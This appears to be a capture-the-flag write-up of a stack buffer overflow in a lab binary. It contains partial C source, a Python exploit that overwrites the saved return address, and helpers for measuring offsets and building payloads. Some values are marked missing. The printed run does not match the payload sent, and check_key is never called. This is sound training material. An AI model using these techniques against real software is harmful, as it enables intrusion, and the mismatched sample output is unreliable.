Hdhub4ubike

Running the binary:

```
$ ./hdhub4ubike
=== Welcome to the HD Bike Hub ===
Enter your hub key:
```

Static analysis quickly reveals that the binary is stripped (no symbols) and that it is compiled with [first flag missing from the page], -z execstack, and -no-pie: classic "easy pwn" settings. -no-pie means the binary is loaded at a fixed address, so a jump target can be hard-coded in the exploit, and -z execstack leaves the stack executable.

The relevant parts of the source (the page does not show which call reads the key into buf; it has to copy more than 64 bytes for the overflow below to work):

```c
#include <stdio.h>
#include <string.h>

/* the 0x30-byte secret lives in the .rodata section; its value is not shown on the page */
extern const char secret_key[];

int main(void)
{
    char buf[64];

    puts("=== Welcome to the HD Bike Hub ===");
    printf("Enter your hub key: ");
    /* ... the call that reads the key into buf is not shown on the page ... */
}

/* ---------------------------------------------------- */
int check_key(const char *key)
{
    // key must be exactly 0x30 bytes long
    if (strlen(key) != 0x30)
        return 0;
    // compare with a secret stored in the .rodata section
    if (strcmp(key, secret_key) != 0)
        return 0;
    return 1;   // key accepted
}
```

The exploit (exploit.py) fills the 64-byte buffer, clobbers the 8-byte saved RBP, and overwrites the saved return address with TARGET_ADDR:

```python
#!/usr/bin/env python3
import struct

import pexpect

BIN = "./hdhub4ubike"
TARGET_ADDR = ...   # address written over the saved RIP; its value is not shown on the page


def main():
    # Spawn in bytes mode: with encoding='utf-8', pexpect would try to UTF-8-encode
    # the packed address and mangle any byte >= 0x80 (and reject bytes outright).
    p = pexpect.spawn(BIN)
    p.expect(b"Enter your hub key:")

    # build payload
    payload = b"A" * 64                          # fill buffer
    payload += b"B" * 8                          # overwrite saved RBP
    payload += struct.pack("<Q", TARGET_ADDR)    # overwrite RIP

    p.sendline(payload)
    p.expect(pexpect.EOF)
    print(p.before.decode(errors="replace"))     # whatever the target prints after the jump


if __name__ == "__main__":
    main()
```

Running the script prints the flag instantly:

```
$ ./exploit.py
=== Welcome to the HD Bike Hub ===
Enter your hub key: flagh0p3_y0u_f0und_th3_h1d3_b1k3
flagh0p3_y0u_f0und_th3_h1d3_b1k3
```

Congratulations – you've successfully bypassed the hub-key check and recovered the flag from hdhub4ubike! 🎉
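The exploit above hard-codes the distance to the saved return address (64 bytes of buf plus 8 bytes of saved RBP) and assumes the packed address survives whatever call reads the key. The following Python is an added example, not code from the original write-up: it generates a cyclic pattern so that offset can be measured from a crash instead of guessed, builds the same 64/8/8 payload layout for an arbitrary target, and flags bytes inside the address that a line- or string-oriented reader would stop on. The 0x401136 and 0x400a00 targets in the usage section are made-up values, not the binary's real TARGET_ADDR.

```python
import struct

# Stack layout from the target's main(): char buf[64], then the saved RBP
# (8 bytes on x86-64), then the saved return address the exploit overwrites.
BUF_SIZE = 64
SAVED_RBP_SIZE = 8
RIP_OFFSET = BUF_SIZE + SAVED_RBP_SIZE      # 72 bytes before the saved RIP


def de_bruijn(alphabet: bytes, n: int) -> bytes:
    """Cyclic sequence over `alphabet` in which every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq)


def cyclic(length: int, alphabet: bytes = b"0123456789abcdef") -> bytes:
    """First `length` bytes of a de Bruijn sequence. Every 4-byte window is unique
    (16**4 = 65536 of them), so whatever lands in a register maps back to one offset."""
    if length > len(alphabet) ** 4:
        raise ValueError("pattern would repeat; use a larger alphabet")
    return de_bruijn(alphabet, 4)[:length]


def find_offset(pattern: bytes, crash_value) -> int:
    """Offset in `pattern` of the bytes that ended up at RSP / in RIP after the crash.
    Accepts the raw bytes or the 64-bit register value as an int; -1 if not from the pattern."""
    if isinstance(crash_value, int):
        crash_value = struct.pack("<Q", crash_value)
    return pattern.find(crash_value)


def build_payload(target: int, rip_offset: int = RIP_OFFSET) -> bytes:
    """Same layout as the write-up's exploit: filler up to the saved RBP,
    8 bytes over the saved RBP, then the little-endian target over the saved RIP."""
    payload = b"A" * (rip_offset - SAVED_RBP_SIZE)   # fill buf
    payload += b"B" * SAVED_RBP_SIZE                 # overwrite saved RBP
    payload += struct.pack("<Q", target)             # overwrite RIP
    return payload


def stopper_bytes(payload: bytes, stoppers: bytes = b"\n") -> list:
    """(index, byte) pairs for bytes the reader would stop on before the payload ends.
    The write-up does not show which call reads the key, so which bytes are fatal
    depends on it: 0x0a for gets()/fgets()-style readers, 0x00 for strcpy()-style ones."""
    return [(i, b) for i, b in enumerate(payload[:-1]) if b in stoppers]


if __name__ == "__main__":
    # Step 1: crash the target with a pattern and read the 8 bytes at RSP (or the
    # faulting RIP) in the debugger. Simulated here with the pattern's own bytes
    # at offset 72, where this binary's saved RIP sits.
    pat = cyclic(128)
    print("saved RIP offset:", find_offset(pat, pat[72:80]))

    # Step 2: build the payload for a target address (made-up value).
    payload = build_payload(0x401136)
    print(len(payload), "bytes; RIP gets", payload[RIP_OFFSET:].hex())

    # Step 3: check the address for bytes the reader might stop on (made-up value
    # chosen to contain 0x0a).
    print("stopper bytes:", stopper_bytes(build_payload(0x400a00)))
```

The offset measurement is the check the hard-coded 64 + 8 in the exploit skips: if the compiler had padded the frame or placed another local below buf, the pattern would reveal the real distance. The stopper check is worth running on any candidate address before sending it, since a truncated payload fails silently rather than crashing.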